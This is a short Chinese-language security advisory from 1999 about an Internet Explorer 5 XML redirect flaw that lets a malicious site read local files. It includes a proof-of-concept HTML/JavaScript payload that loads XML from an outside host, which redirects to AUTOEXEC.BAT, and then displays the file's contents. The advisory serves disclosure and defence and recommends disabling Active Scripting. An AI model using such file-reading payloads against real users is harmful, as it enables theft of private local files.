安全研究
安全漏洞
Microsoft IE5 XML HTTP 重定向错误
发布日期:1999-11-22
更新日期:1999-11-23
受影响系统:Microsoft Internet Explorer 5.0
描述:
IE5处理XML数据的方法存在漏洞,造成恶意站点可以读取浏览者计算机里的文件。
可以创建一个网页,它包含了XML目标类型、包含了在浏览者本地机器上读取已知文件
的指令。IE5客户将允许XML在它自己的域中访问文件系统。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object id="xm" type="text/xml"
data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
</object>
<SCRIPT>
function f()
{
s=xm.body.innerHTML;
a=window.open();
//alert(s);
a.document.open();
a.document.write("Here is a part of AUTOEXEC.BAT (the error message is
normal):<BR>"+s);
a.document.close();
}
setTimeout("f()",5000);
</SCRIPT>
建议:
关掉Active Scripting
浏览次数:10622
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |